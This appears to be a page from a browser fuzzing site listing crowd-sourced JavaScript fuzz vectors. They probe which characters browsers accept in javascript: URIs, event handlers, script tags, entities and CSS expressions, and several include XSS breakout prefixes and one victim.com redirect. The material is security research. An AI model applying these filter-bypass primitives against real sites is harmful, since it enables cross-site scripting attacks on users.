Featured vector

Chrome 0.0
<a href="/0x5cgoogle.com" id="fuzzelement1">asdf</a> <script> if(document.getElementById('fuzzelement1').hostname=="google.com") { alert(1); } </script>

Fuzz vector cloud

5,453,920 Successful fuzzes

Fuzz Vectors

Searching for "JavaScript"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters that eat JavaScript regex escapes <script> var regexChars = /*chr*\$/g if(!("*chr*$".match(regexChars))) { logChr(*num*) } </script> @tifkin_
Characters that modify JavaScript regex character classes <script> var regexChars = /[*chr*.]/g if(!(".".match(regexChars))) { logChr(*num*) } <script> @tifkin_
Characters ignored in Javascript function call with unicode 2 <script>l\*chr*u006fg(*num*)</script> @garethheyes
Characters ignored in Javascript function call with unicode <script>l\u006f*chr*g(*num*)</script> @garethheyes
JavaScript characters that swallow the next character <script>a='asdf*chr*\';logChr(*num*)//asdf'</script> @tifkin_
Characters that separate JavaScript object key and value <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> @peksa
JavaScript operators that separate objects and scopes <script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script> @peksa
JavaScript operators that evaluate argument in variable assignment <script> var v = {}*chr*logChr(*num*) </script> @peksa
Things that break from URIs javascript comments <a href="javascript://*chr*logChr(*num*)">aaa</a> @0xAli
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that start JavaScript double quote strings <script> *chr*"; logChr(*num*) </script> @peksa
Characters that escape JavaScript single line comments <script> // hmm *chr*logChr(*num*) </script> @peksa
Ignored characters in javascript protocol uris <script> var a = document.createElement('a'); a.href = "java\u*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script> @peksa
Characters that separate JavaScript assignment statements <script> var a={}*chr*b={}&logChr(*num*); </script> @Giutro
Characters that allow a new statement to begin2 <script> var a={}*chr*b=logChr(*num*); </script> @tifkin_
Characters that allow a new statement to begin <script> var a={}*chr*logChr(*num*); </script> @tifkin_
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Characters that make a double quote valid <script> *chr*"; logChr(*num*); </script> @tifkin_
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed to hex encodings of javascript variables <script> lo\u*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed to hex encode javascript <script> lo\*chr*0067Chr(*num*); </script> @tifkin_
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Uncode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes